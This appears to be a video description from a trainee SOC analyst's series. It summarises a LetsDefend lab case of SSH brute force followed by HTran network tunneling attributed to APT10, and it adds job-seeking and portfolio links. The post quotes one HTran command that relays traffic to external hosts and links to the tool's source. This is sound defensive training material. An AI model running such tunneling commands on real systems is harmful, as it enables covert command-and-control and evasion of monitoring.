Day 110 of Becoming a SOC Analyst — SOC330 HTran Network Tunneling APT10 MENUPASS (True Positive)
Attacker at 87.249.134.130 gained access to host Jenessa (172.16.17.131) via SSH brute force against the analyst account, then compiled and executed HTran on the endpoint to establish a proxy tunnel — ./HTran -slave 218.27.4.98 4444 18.189.13.47 80 — routing traffic out through known malicious infrastructure. No lateral movement or additional persistence was identified beyond the tunnel itself, but the HTran binary, compromised account, and sudo access were all cleaned up and the endpoint contained. APT10/MENUPASS TTPs confirmed: SSH brute force → proxy tool deployment → protocol tunneling for C2.
🔬 Analysis Reports
🦠 VirusTotal (HTran) → https://www.virustotal.com/gui/file/3...
🔍 AbuseIPDB (attacker) → https://www.abuseipdb.com/check/87.24...
🔍 AbuseIPDB (proxy endpoint) → https://www.abuseipdb.com/check/218.2...
📦 HTran Reference → https://github.com/HiwinCN/HTran
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 110 intro
00:26 Alert Details
01:30 Investigation
17:30 Playbook Answers
39:00 5W Log
42:00 Result
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #APT10 #MENUPASS #HTran #ProtocolTunneling #SSHBruteForce #IncidentResponse #SIEM #Day110 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity